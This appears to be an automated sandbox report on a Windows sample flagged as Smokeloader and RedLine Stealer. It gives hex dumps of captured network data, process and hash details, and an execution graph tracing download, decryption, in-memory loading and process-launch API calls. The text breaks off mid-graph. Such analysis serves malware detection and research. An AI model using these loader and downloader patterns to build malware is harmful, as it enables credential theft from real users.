                                                                  Dec 20, 2024 16:23:59.792891979 CET1236INData Raw: 2f 01 00 70 a2 25 18 11 05 28 12 00 00 06 a2 25 19 72 33 01 00 70 a2 25 1a 11 04 28 12 00 00 06 a2 28 20 00 00 0a 6f 21 00 00 0a 02 7b 13 00 00 04 11 05 1f 64 6a 5a 11 04 5b 28 22 00 00 0a 6f 23 00 00 0a 06 17 58 0a 08 17 58 0c 08 07 8e 69 3f aa
                                                                  Data Ascii: /p%(%r3p%(( o!{djZ[("o#XXi?*0t<%r7p%r;p%rAp%rGp%rMpl+l#@[X j[i/ j/rSp?($*(%*Js(&&(%*
                                                                  Dec 20, 2024 16:23:59.793015003 CET1236INData Raw: 00 00 00 00 00 00 6f 5a 00 00 0a 02 7b 17 00 00 04 17 6f 5b 00 00 0a 02 7b 17 00 00 04 23 00 00 00 00 00 80 56 40 6f 5c 00 00 0a 02 7b 17 00 00 04 16 6f 5d 00 00 0a 02 7b 17 00 00 04 1f 09 20 0c 01 00 00 73 3e 00 00 0a 6f 3f 00 00 0a 02 7b 17 00
                                                                  Data Ascii: oZ{o[{#V@o\{o]{ s>o?{s@oA{rpoB{(<o^{(_o`{(aob{oc{ AUsCoD{oE{rpo!{od{
                                                                  Dec 20, 2024 16:23:59.793051004 CET1236INData Raw: 00 04 14 6f 56 00 00 0a 02 7b 09 00 00 04 16 6f 57 00 00 0a 02 7b 09 00 00 04 16 6f 58 00 00 0a 02 7b 09 00 00 04 17 6f 59 00 00 0a 02 7b 09 00 00 04 23 00 00 00 00 00 00 00 00 6f 5a 00 00 0a 02 7b 09 00 00 04 17 6f 5b 00 00 0a 02 7b 09 00 00 04
                                                                  Data Ascii: oV{oW{oX{oY{#oZ{o[{#V@o\{o]{ s>o?{s@oA{rpoB{(<o^{(_o`{(aob{oc{ AasC
                                                                  Dec 20, 2024 16:23:59.793087959 CET1236INData Raw: 45 00 00 0a 02 7b 0c 00 00 04 72 9d 04 00 70 6f 21 00 00 0a 02 7b 0d 00 00 04 28 3c 00 00 0a 6f 39 00 00 0a 02 7b 0d 00 00 04 19 6f 48 00 00 0a 02 7b 0d 00 00 04 28 4b 00 00 0a 6f 4c 00 00 0a 02 7b 0d 00 00 04 06 72 b5 04 00 70 6f 52 00 00 0a 74
                                                                  Data Ascii: E{rpo!{(<o9{oH{(KoL{rpoRtPom{on{ s>o?{s@oA{rpoB{Q?sCoD{oo{op{oq{or{
                                                                  Dec 20, 2024 16:23:59.793123007 CET1236INData Raw: 0a 6f 39 00 00 0a 02 7b 13 00 00 04 1b 6f 74 00 00 0a 02 7b 13 00 00 04 20 5e 01 00 00 20 da 00 00 00 73 3e 00 00 0a 6f 3f 00 00 0a 02 7b 13 00 00 04 1c 1e 1c 1e 73 40 00 00 0a 6f 41 00 00 0a 02 7b 13 00 00 04 1f 64 6f 75 00 00 0a 02 7b 13 00 00
                                                                  Data Ascii: o9{ot{ ^ s>o?{s@oA{dou{rApoB{(vow{ g4sCoD{oE{o#{ox{oy{{oz{o{{ox{oy{{
                                                                  Dec 20, 2024 16:23:59.793811083 CET1236INData Raw: 7b 19 00 00 04 6f 3b 00 00 0a 02 16 28 90 00 00 0a 02 1a 1b 1a 1b 73 40 00 00 0a 28 91 00 00 0a 02 72 47 07 00 70 28 42 00 00 0a 02 72 47 07 00 70 6f 21 00 00 0a 02 7b 06 00 00 04 16 6f 92 00 00 0a 02 7b 06 00 00 04 6f 93 00 00 0a 02 7b 0b 00 00
                                                                  Data Ascii: {o;(s@(rGp(BrGpo!{o{o{o{o{o{o{o{o(*6((.*(%*2rmp('&*Js(&&(%*(%***2rp('&*2rmp('
                                                                  Dec 20, 2024 16:23:59.793865919 CET1236INData Raw: 16 19 16 73 4f 00 00 0a 6f 50 00 00 0a 02 7b 20 00 00 04 1f 12 1f 20 73 3e 00 00 0a 6f 3f 00 00 0a 02 7b 20 00 00 04 1a 16 1a 16 73 40 00 00 0a 6f 41 00 00 0a 02 7b 20 00 00 04 72 0d 05 00 70 6f 42 00 00 0a 02 7b 20 00 00 04 20 af 00 00 00 1f 34
                                                                  Data Ascii: sOoP{ s>o?{ s@oA{ rpoB{ 4sCoD{ oE{ r3po!{!ox{!oy{!{oz{!o{{"(8o9{"o:{'o;{"o:{#o;{"o:
                                                                  Dec 20, 2024 16:23:59.793901920 CET1236INData Raw: 17 6f 59 00 00 0a 02 7b 23 00 00 04 23 00 00 00 00 00 00 00 00 6f 5a 00 00 0a 02 7b 23 00 00 04 17 6f 5b 00 00 0a 02 7b 23 00 00 04 23 00 00 00 00 00 80 56 40 6f 5c 00 00 0a 02 7b 23 00 00 04 16 6f 5d 00 00 0a 02 7b 23 00 00 04 1f 09 1c 73 3e 00
                                                                  Data Ascii: oY{##oZ{#o[{##V@o\{#o]{#s>o?{#s@oA{#rpoB{#(<o^{#(_o`{#(aob{#oc{# AVsCoD{#oE{#rpo!{#
                                                                  Dec 20, 2024 16:23:59.912616014 CET1236INData Raw: 04 14 6f 56 00 00 0a 02 7b 26 00 00 04 16 6f 57 00 00 0a 02 7b 26 00 00 04 16 6f 58 00 00 0a 02 7b 26 00 00 04 17 6f 59 00 00 0a 02 7b 26 00 00 04 23 00 00 00 00 00 00 00 00 6f 5a 00 00 0a 02 7b 26 00 00 04 17 6f 5b 00 00 0a 02 7b 26 00 00 04 23
                                                                  Data Ascii: oV{&oW{&oX{&oY{&#oZ{&o[{&#V@o\{&o]{&Vs>o?{&s@oA{&r#poB{&(<o^{&(_o`{&(aob{&oc{& ASsCoD


                                                                  Statistics

                                                                  CPU Usage

                                                                  Click to jump to process

                                                                  Memory Usage

                                                                  Click to jump to process

                                                                  High Level Behavior Distribution

                                                                  Click to dive into process behavior distribution

                                                                  Behavior

                                                                  Click to jump to process

                                                                  System Behavior

                                                                  General

                                                                  Target ID:0
                                                                  Start time:10:22:23
                                                                  Start date:20/12/2024
                                                                  Path:C:\Users\user\Desktop\zmTSHkabY6.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\Desktop\zmTSHkabY6.exe"
                                                                  Imagebase:0x400000
                                                                  File size:1'945'088 bytes
                                                                  MD5 hash:CAB7AF24073C5C1C62A2957DD5983C98
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.3221073765.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                  • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.3220928056.0000000000D99000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:7
                                                                  Start time:10:24:03
                                                                  Start date:20/12/2024
                                                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 2424 -s 1496
                                                                  Imagebase:0x7d0000
                                                                  File size:483'680 bytes
                                                                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Disassembly

                                                                  Reset < >

                                                                    Execution Graph

                                                                    Execution Coverage:2.5%
                                                                    Dynamic/Decrypted Code Coverage:19.3%
                                                                    Signature Coverage:11.9%
                                                                    Total number of Nodes:1081
                                                                    Total number of Limit Nodes:21
                                                                    execution_graph 36148 10001f20 36191 10005956 GetSystemTimeAsFileTime 36148->36191 36150 10001f48 36193 100059d5 36150->36193 36152 10001f4f 36196 10001523 36152->36196 36154 10002174 36226 100010a3 36154->36226 36159 10002025 36229 10001cdd 44 API calls __EH_prolog3_GS 36159->36229 36162 1000202e 36163 10002164 36162->36163 36230 100059b4 27 API calls _unexpected 36162->36230 36165 10001bb9 15 API calls 36163->36165 36167 10002172 36165->36167 36166 10002040 36231 10001c33 29 API calls 36166->36231 36167->36154 36169 10002052 36232 10002493 17 API calls __InternalCxxFrameHandler 36169->36232 36171 1000205f 36233 10002230 17 API calls __InternalCxxFrameHandler 36171->36233 36173 10002079 36234 10002230 17 API calls __InternalCxxFrameHandler 36173->36234 36175 1000209f 36235 1000219f 17 API calls __InternalCxxFrameHandler 36175->36235 36177 100020a9 36236 10001bb9 36177->36236 36180 10001bb9 15 API calls 36181 100020bb 36180->36181 36182 10001bb9 15 API calls 36181->36182 36183 100020c4 36182->36183 36240 10001725 8 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 36183->36240 36185 100020df 36186 10002100 CreateProcessA 36185->36186 36187 10002135 36186->36187 36188 1000213c ShellExecuteA 36186->36188 36187->36188 36189 1000215b 36187->36189 36188->36189 36190 10001bb9 15 API calls 36189->36190 36190->36163 36192 10005988 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 36191->36192 36192->36150 36241 10006e9c GetLastError 36193->36241 36197 1000152f __EH_prolog3_GS 36196->36197 36274 1000184b 36197->36274 36200 10001593 36278 1000190a 36200->36278 36201 100015ff 36283 1000179a 36201->36283 36202 10001541 36202->36200 36209 1000179a 17 API calls 36202->36209 36204 1000160d 36288 10005939 36204->36288 36207 10001650 InternetSetOptionA InternetConnectA 36211 10001692 HttpOpenRequestA 36207->36211 36212 100016e8 InternetCloseHandle 36207->36212 36208 100016eb 36210 10001704 36208->36210 36337 10001bdc 15 API calls 36208->36337 36209->36200 36214 10001bb9 15 API calls 36210->36214 36215 100016e2 InternetCloseHandle 36211->36215 36216 100016bc 36211->36216 36212->36208 36217 1000171b 36214->36217 36215->36212 36291 100010c7 36216->36291 36338 1000e8a5 36217->36338 36221 100016d3 36305 10001175 36221->36305 36222 100016df InternetCloseHandle 36222->36215 36227 100010ad 36226->36227 36228 100010bd CoUninitialize 36227->36228 36229->36162 36230->36166 36231->36169 36232->36171 36233->36173 36234->36175 36235->36177 36237 10001bc4 36236->36237 36238 10001bcc 36236->36238 36389 10001bdc 15 API calls 36237->36389 36238->36180 36240->36185 36242 10006eb3 36241->36242 36243 10006eb9 36241->36243 36266 10007580 6 API calls _unexpected 36242->36266 36247 10006ebf SetLastError 36243->36247 36267 100075bf 6 API calls _unexpected 36243->36267 36246 10006ed7 36246->36247 36248 10006edb 36246->36248 36254 10006f53 36247->36254 36255 100059df 36247->36255 36268 10007aa7 12 API calls 2 library calls 36248->36268 36251 10006ee7 36252 10006f06 36251->36252 36253 10006eef 36251->36253 36270 100075bf 6 API calls _unexpected 36252->36270 36269 100075bf 6 API calls _unexpected 36253->36269 36273 10006928 27 API calls CallUnexpected 36254->36273 36255->36152 36260 10006f12 36261 10006f16 36260->36261 36262 10006f27 36260->36262 36271 100075bf 6 API calls _unexpected 36261->36271 36272 10006c9e EnterCriticalSection LeaveCriticalSection _unexpected 36262->36272 36265 10006efd 36265->36247 36266->36243 36267->36246 36268->36251 36269->36265 36270->36260 36271->36265 36272->36265 36275 10001868 36274->36275 36275->36275 36276 1000190a 17 API calls 36275->36276 36277 1000187c 36276->36277 36277->36202 36279 10001978 36278->36279 36282 10001920 __InternalCxxFrameHandler 36278->36282 36341 10001a59 17 API calls std::_Xinvalid_argument 36279->36341 36282->36201 36284 100017b3 __InternalCxxFrameHandler 36283->36284 36285 100017eb 36283->36285 36284->36204 36342 10001884 17 API calls 36285->36342 36343 100070ee 36288->36343 36292 100010d3 __EH_prolog3_GS 36291->36292 36293 1000184b 17 API calls 36292->36293 36294 100010e3 HttpAddRequestHeadersA 36293->36294 36369 100017f1 36294->36369 36296 10001112 HttpAddRequestHeadersA 36297 100017f1 17 API calls 36296->36297 36298 10001132 HttpAddRequestHeadersA 36297->36298 36299 100017f1 17 API calls 36298->36299 36300 10001152 HttpAddRequestHeadersA 36299->36300 36301 10001bb9 15 API calls 36300->36301 36302 1000116d 36301->36302 36303 1000e8a5 5 API calls 36302->36303 36304 10001172 HttpSendRequestA 36303->36304 36304->36221 36304->36222 36306 10001184 __EH_prolog3_GS 36305->36306 36307 100011c5 InternetSetFilePointer 36306->36307 36308 100011e3 InternetReadFile 36307->36308 36309 1000121d __InternalCxxFrameHandler 36308->36309 36309->36308 36310 10001260 36309->36310 36311 1000127d HttpQueryInfoA 36310->36311 36312 100012a6 CoCreateInstance 36311->36312 36313 1000150a 36311->36313 36312->36313 36315 100012d8 36312->36315 36314 1000e8a5 5 API calls 36313->36314 36316 10001520 36314->36316 36315->36313 36317 1000184b 17 API calls 36315->36317 36316->36222 36318 100012f7 36317->36318 36374 10001006 20 API calls 36318->36374 36320 1000130c 36321 10001bb9 15 API calls 36320->36321 36328 1000134f 36321->36328 36322 1000149d 36378 10005926 12 API calls __dosmaperr 36322->36378 36323 10001427 __InternalCxxFrameHandler 36323->36322 36325 100014ae __InternalCxxFrameHandler 36323->36325 36327 100014aa 36323->36327 36325->36313 36326 100014a2 36380 1000584c 15 API calls __strnicoll 36326->36380 36327->36325 36379 10005926 12 API calls __dosmaperr 36327->36379 36328->36323 36328->36325 36331 10001456 36328->36331 36332 10001449 36328->36332 36331->36323 36376 10005926 12 API calls __dosmaperr 36331->36376 36375 10005926 12 API calls __dosmaperr 36332->36375 36335 1000144e 36377 1000584c 15 API calls __strnicoll 36335->36377 36337->36210 36381 100026ff 36338->36381 36340 10001722 36340->36154 36340->36159 36347 10007102 36343->36347 36344 10007106 36360 10001629 InternetOpenA 36344->36360 36362 10005926 12 API calls __dosmaperr 36344->36362 36346 10007130 36363 1000584c 15 API calls __strnicoll 36346->36363 36347->36344 36349 10007140 36347->36349 36347->36360 36364 100069d1 27 API calls 2 library calls 36349->36364 36351 1000714c 36352 10007156 36351->36352 36356 1000716d 36351->36356 36365 1000a31e 15 API calls 2 library calls 36352->36365 36354 10007244 36354->36360 36368 10005926 12 API calls __dosmaperr 36354->36368 36355 100071ef 36355->36360 36366 10005926 12 API calls __dosmaperr 36355->36366 36356->36354 36356->36355 36359 10007238 36367 1000584c 15 API calls __strnicoll 36359->36367 36360->36207 36360->36208 36362->36346 36363->36360 36364->36351 36365->36360 36366->36359 36367->36360 36368->36360 36370 100017ff 36369->36370 36370->36370 36371 1000180d __InternalCxxFrameHandler 36370->36371 36373 1000188f 17 API calls __InternalCxxFrameHandler 36370->36373 36371->36296 36373->36371 36374->36320 36375->36335 36376->36335 36377->36323 36378->36326 36379->36326 36380->36325 36382 10002707 36381->36382 36383 10002708 IsProcessorFeaturePresent 36381->36383 36382->36340 36385 10002b1c 36383->36385 36388 10002adf SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 36385->36388 36387 10002bff 36387->36340 36388->36387 36389->36238 36390 4034c0 CryptAcquireContextW 36391 40360a GetLastError CryptReleaseContext 36390->36391 36392 40354e CryptCreateHash 36390->36392 36393 403754 36391->36393 36392->36391 36394 403572 36392->36394 36395 40377a std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 36393->36395 36397 4037a2 36393->36397 36414 409035 36394->36414 36439 408ec2 36395->36439 36446 40c26f 36397->36446 36399 40379e 36400 4035aa 36428 40e46b 36400->36428 36405 4035e6 CryptDeriveKey 36405->36391 36407 403625 36405->36407 36406 4035d8 GetLastError 36406->36393 36432 40e2bd 36407->36432 36409 40362b __InternalCxxFrameHandler 36410 409035 27 API calls 36409->36410 36413 40364a __InternalCxxFrameHandler 36410->36413 36411 403748 CryptDestroyKey 36411->36393 36412 4036bc CryptDecrypt 36412->36411 36412->36413 36413->36411 36413->36412 36416 408ff7 36414->36416 36415 40e2bd ___std_exception_copy 15 API calls 36415->36416 36416->36415 36417 409016 36416->36417 36419 409018 36416->36419 36453 40ff9c RtlEnterCriticalSection RtlLeaveCriticalSection _unexpected 36416->36453 36417->36400 36420 401600 Concurrency::cancel_current_task 36419->36420 36422 409022 36419->36422 36451 40a370 RaiseException 36420->36451 36454 40a370 RaiseException 36422->36454 36423 40161c 36452 40a131 26 API calls 2 library calls 36423->36452 36426 4097b1 36427 401643 36427->36400 36429 40e479 36428->36429 36455 40e2c8 36429->36455 36437 41249e _unexpected 36432->36437 36433 4124dc 36493 40c339 14 API calls __dosmaperr 36433->36493 36434 4124c7 RtlAllocateHeap 36436 4124da 36434->36436 36434->36437 36436->36409 36437->36433 36437->36434 36492 40ff9c RtlEnterCriticalSection RtlLeaveCriticalSection _unexpected 36437->36492 36440 408eca 36439->36440 36441 408ecb IsProcessorFeaturePresent 36439->36441 36440->36399 36443 408f12 36441->36443 36494 408ed5 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 36443->36494 36445 408ff5 36445->36399 36495 40c1fb 25 API calls 2 library calls 36446->36495 36448 40c27e 36496 40c28c 11 API calls __FrameHandler3::FrameUnwindToState 36448->36496 36450 40c28b 36451->36423 36452->36427 36453->36416 36454->36426 36456 40e2df 36455->36456 36457 40e2f1 36456->36457 36458 40e309 36456->36458 36473 4035bc CryptHashData 36456->36473 36482 40c339 14 API calls __dosmaperr 36457->36482 36484 40c369 37 API calls 2 library calls 36458->36484 36461 40e2f6 36483 40c25f 25 API calls __cftof 36461->36483 36462 40e314 36464 40e341 36462->36464 36465 40e322 36462->36465 36467 40e349 36464->36467 36468 40e413 36464->36468 36485 413393 19 API calls 2 library calls 36465->36485 36467->36473 36486 4132ab MultiByteToWideChar 36467->36486 36468->36473 36490 4132ab MultiByteToWideChar 36468->36490 36471 40e43d 36471->36473 36491 40c339 14 API calls __dosmaperr 36471->36491 36472 40e38b 36472->36473 36474 40e396 GetLastError 36472->36474 36473->36405 36473->36406 36476 40e3f6 36474->36476 36481 40e3a1 36474->36481 36476->36473 36489 40c339 14 API calls __dosmaperr 36476->36489 36478 40e3e0 36488 4132ab MultiByteToWideChar 36478->36488 36481->36476 36481->36478 36487 413271 37 API calls __fassign 36481->36487 36482->36461 36483->36473 36484->36462 36485->36473 36486->36472 36487->36481 36488->36476 36489->36473 36490->36471 36491->36473 36492->36437 36493->36436 36494->36445 36495->36448 36496->36450 36497 4020c0 36498 40213b 36497->36498 36499 4020dd 36497->36499 36500 408ec2 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 36498->36500 36499->36498 36501 4020e3 CreateFileA 36499->36501 36502 402149 36500->36502 36501->36498 36503 402103 WriteFile CloseHandle 36501->36503 36504 408ec2 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 36503->36504 36505 402135 36504->36505 36506 401880 36507 4018e9 InternetSetFilePointer InternetReadFile 36506->36507 36508 40197d __cftof 36507->36508 36509 4019a2 HttpQueryInfoA 36508->36509 36510 401d25 36509->36510 36511 4019c6 CoCreateInstance 36509->36511 36512 408ec2 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 36510->36512 36511->36510 36514 4019ff 36511->36514 36513 401d50 36512->36513 36514->36510 36534 402470 36514->36534 36516 401a5c MultiByteToWideChar 36517 409035 27 API calls 36516->36517 36518 401aae MultiByteToWideChar 36517->36518 36519 401b10 36518->36519 36519->36519 36549 402310 27 API calls 3 library calls 36519->36549 36521 401c00 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 36522 401cf1 36521->36522 36525 409035 27 API calls 36521->36525 36522->36510 36523 401b2c 36523->36521 36524 401d56 36523->36524 36526 40c26f 25 API calls 36524->36526 36528 401c37 36525->36528 36527 401d5b 36526->36527 36528->36522 36529 409035 27 API calls 36528->36529 36533 401cc4 36528->36533 36531 401cb4 36529->36531 36550 4014b0 25 API calls 3 library calls 36531->36550 36551 4014b0 25 API calls 3 library calls 36533->36551 36537 40248e __InternalCxxFrameHandler 36534->36537 36539 4024b4 36534->36539 36535 40259e 36554 4016a0 27 API calls std::_Xinvalid_argument 36535->36554 36537->36516 36538 4025a3 36555 401600 27 API calls 2 library calls 36538->36555 36539->36535 36541 402508 36539->36541 36542 40252d 36539->36542 36541->36538 36552 401600 27 API calls 3 library calls 36541->36552 36547 402519 __InternalCxxFrameHandler 36542->36547 36553 401600 27 API calls 3 library calls 36542->36553 36543 4025a8 36546 40c26f 25 API calls 36546->36535 36547->36546 36548 402580 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 36547->36548 36548->36516 36549->36523 36550->36533 36551->36522 36552->36547 36553->36547 36555->36543 36579 402c70 36580 402c94 SetLastError 36579->36580 36581 402cbc 36579->36581 36657 402920 67 API calls 36580->36657 36582 402cc6 36581->36582 36584 402d01 SetLastError 36581->36584 36592 402d29 36581->36592 36658 402920 67 API calls 36582->36658 36659 402920 67 API calls 36584->36659 36585 402ca6 36588 408ec2 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 36585->36588 36589 402cb8 36588->36589 36590 402cd0 SetLastError 36593 408ec2 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 36590->36593 36591 402d13 36594 408ec2 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 36591->36594 36592->36582 36595 402d94 GetNativeSystemInfo 36592->36595 36596 402ced 36593->36596 36597 402d25 36594->36597 36595->36582 36598 402dc3 VirtualAlloc 36595->36598 36599 402e03 GetProcessHeap HeapAlloc 36598->36599 36600 402ddd VirtualAlloc 36598->36600 36601 402e20 VirtualFree 36599->36601 36602 402e34 36599->36602 36600->36599 36603 402def 36600->36603 36601->36602 36604 402e7c SetLastError 36602->36604 36605 402e9e VirtualAlloc 36602->36605 36660 402920 67 API calls 36603->36660 36607 402e84 36604->36607 36615 402eb7 __InternalCxxFrameHandler __cftof 36605->36615 36661 4033d0 16 API calls ___vcrt_freefls@4 36607->36661 36608 402df9 36608->36599 36610 402e8b 36611 408ec2 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 36610->36611 36612 402e9a 36611->36612 36614 402f9c 36634 402a80 36614->36634 36615->36604 36615->36607 36615->36614 36633 402bf0 VirtualAlloc 36615->36633 36616 403165 36617 402950 50 API calls 36616->36617 36618 403176 36617->36618 36618->36607 36626 40317e 36618->36626 36619 40303c 36619->36607 36619->36616 36642 402950 36619->36642 36620 40320a 36623 408ec2 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 36620->36623 36621 4031ba 36624 4031f4 36621->36624 36625 4031c5 36621->36625 36627 403220 36623->36627 36628 408ec2 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 36624->36628 36630 408ec2 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 36625->36630 36626->36620 36626->36621 36629 403206 36628->36629 36631 4031f0 36630->36631 36633->36615 36635 402bdc 36634->36635 36639 402aa0 36634->36639 36635->36619 36636 402bcb SetLastError 36636->36619 36637 402bae SetLastError 36637->36619 36639->36635 36639->36636 36639->36637 36640 402b8f SetLastError 36639->36640 36640->36619 36643 402969 36642->36643 36651 4029a5 36642->36651 36645 4029be VirtualProtect 36643->36645 36649 402974 36643->36649 36644 408ec2 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 36646 4029ba 36644->36646 36647 402a02 GetLastError FormatMessageA 36645->36647 36645->36651 36646->36619 36648 402a27 36647->36648 36648->36648 36650 402a2e LocalAlloc 36648->36650 36649->36651 36662 402c10 VirtualFree 36649->36662 36663 4028e0 42 API calls 36650->36663 36651->36644 36653 402a51 OutputDebugStringA LocalFree LocalFree 36654 408ec2 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 36653->36654 36655 402a77 36654->36655 36655->36619 36657->36585 36658->36590 36659->36591 36660->36608 36661->36610 36662->36651 36663->36653 36664 e8003c 36665 e80049 36664->36665 36679 e80e0f SetErrorMode SetErrorMode 36665->36679 36670 e80265 36671 e802ce VirtualProtect 36670->36671 36673 e8030b 36671->36673 36672 e80439 VirtualFree 36677 e804be 36672->36677 36678 e805f4 LoadLibraryA 36672->36678 36673->36672 36674 e804e3 LoadLibraryA 36674->36677 36676 e808c7 36677->36674 36677->36678 36678->36676 36680 e80223 36679->36680 36681 e80d90 36680->36681 36682 e80dad 36681->36682 36683 e80dbb GetPEB 36682->36683 36684 e80238 VirtualAlloc 36682->36684 36683->36684 36684->36670 36556 40e268 36559 411ac2 36556->36559 36558 40e280 36560 411acd RtlFreeHeap 36559->36560 36564 411af6 __dosmaperr 36559->36564 36561 411ae2 36560->36561 36560->36564 36565 40c339 14 API calls __dosmaperr 36561->36565 36563 411ae8 GetLastError 36563->36564 36564->36558 36565->36563 36685 9a33c3 36686 9a33cd LoadLibraryA 36685->36686 36688 9a6277 36686->36688 36566 aa35c6 36567 aa35dc VirtualProtect 36566->36567 36569 aa3671 36567->36569 36689 40955c 36690 409568 __FrameHandler3::FrameUnwindToState 36689->36690 36717 4092bc 36690->36717 36692 40956f 36693 4096c2 36692->36693 36704 409599 ___scrt_is_nonwritable_in_current_image __FrameHandler3::FrameUnwindToState ___scrt_release_startup_lock 36692->36704 36745 4097b2 4 API calls 2 library calls 36693->36745 36695 4096c9 36746 40f00b 36695->36746 36699 4096d7 36700 4095b8 36701 409639 36725 4098cd 36701->36725 36704->36700 36704->36701 36741 40efe5 37 API calls 2 library calls 36704->36741 36718 4092c5 36717->36718 36750 4099b3 IsProcessorFeaturePresent 36718->36750 36720 4092d1 36751 40ab6a 10 API calls 2 library calls 36720->36751 36722 4092d6 36723 4092da 36722->36723 36752 40ab89 7 API calls 2 library calls 36722->36752 36723->36692 36753 40aa10 36725->36753 36728 40963f 36729 410b89 36728->36729 36755 4167a2 36729->36755 36731 409647 36734 408020 36731->36734 36732 410b92 36732->36731 36761 416a47 37 API calls 36732->36761 36735 402470 27 API calls 36734->36735 36736 408055 36735->36736 36737 402470 27 API calls 36736->36737 36738 40807a 36737->36738 36764 4055c0 36738->36764 36741->36701 36745->36695 37496 40eea9 36746->37496 36749 40efcf 23 API calls __FrameHandler3::FrameUnwindToState 36749->36699 36750->36720 36751->36722 36752->36723 36754 4098e0 GetStartupInfoW 36753->36754 36754->36728 36756 4167ab 36755->36756 36760 4167dd 36755->36760 36762 4112ba 37 API calls 3 library calls 36756->36762 36758 4167ce 36763 4165e9 47 API calls 3 library calls 36758->36763 36760->36732 36761->36732 36762->36758 36763->36760 37183 40f20b 36764->37183 36769 402470 27 API calls 36770 40564e std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 36769->36770 36771 402470 27 API calls 36770->36771 36799 4056b9 __cftof std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 36770->36799 36771->36799 36773 409035 27 API calls 36773->36799 36774 405a91 37189 4064d0 36774->37189 36777 405ab2 37199 4022d0 36777->37199 36778 402470 27 API calls 36778->36799 36781 405ac2 37203 402200 36781->37203 36785 405ad6 36786 405bab 36785->36786 36787 405ade 36785->36787 37315 406770 39 API calls 2 library calls 36786->37315 36792 405af1 36787->36792 36793 405b4e 36787->36793 36790 40c26f 25 API calls 36790->36799 36791 405bb0 36798 4022d0 27 API calls 36791->36798 37305 406550 39 API calls 2 library calls 36792->37305 37310 406660 39 API calls 2 library calls 36793->37310 36794 405a45 Sleep 36794->36799 36797 405af6 36803 4022d0 27 API calls 36797->36803 36801 405bc0 36798->36801 36799->36773 36799->36774 36799->36778 36799->36790 36799->36794 36807 405a6a 36799->36807 36813 405a51 36799->36813 36818 405a3b std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 36799->36818 37270 40f158 41 API calls 36799->37270 37271 409170 6 API calls 36799->37271 37272 409482 28 API calls 36799->37272 37273 409126 RtlEnterCriticalSection RtlLeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 36799->37273 37274 408a60 36799->37274 37279 401d60 36799->37279 36800 405b53 36802 4022d0 27 API calls 36800->36802 36806 402200 25 API calls 36801->36806 36804 405b63 36802->36804 36805 405b06 36803->36805 37311 402250 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 36804->37311 37306 402250 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 36805->37306 36811 405bd4 36806->36811 37303 408440 27 API calls 36807->37303 36816 405caa 36811->36816 36817 405bdc 36811->36817 36812 405b6c 36820 402200 25 API calls 36812->36820 36813->36807 37295 4037d0 36813->37295 36814 405a76 36822 402200 25 API calls 36814->36822 36815 405b0f 36823 402200 25 API calls 36815->36823 37324 406b10 39 API calls 2 library calls 36816->37324 37316 4067f0 39 API calls 2 library calls 36817->37316 36818->36794 36826 405b74 36820->36826 36827 405a7e 36822->36827 36828 405b17 36823->36828 36825 405caf 36837 4022d0 27 API calls 36825->36837 37312 4066f0 39 API calls 2 library calls 36826->37312 36831 402200 25 API calls 36827->36831 37307 4065e0 39 API calls 2 library calls 36828->37307 36829 405be1 36836 4022d0 27 API calls 36829->36836 36835 405a86 36831->36835 36833 405b1c 36841 4022d0 27 API calls 36833->36841 36834 405b79 36843 4022d0 27 API calls 36834->36843 37304 401710 CoUninitialize 36835->37304 36839 405bf1 36836->36839 36840 405cbf 36837->36840 37317 402250 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 36839->37317 36849 402200 25 API calls 36840->36849 36844 405b2c 36841->36844 36846 405b89 36843->36846 37308 402250 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 36844->37308 36845 405bfa 36848 402200 25 API calls 36845->36848 37313 402250 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 36846->37313 36852 405c02 36848->36852 36853 405cd3 36849->36853 36851 405b35 36855 402200 25 API calls 36851->36855 37318 406870 39 API calls 2 library calls 36852->37318 36857 405d94 36853->36857 37325 406b90 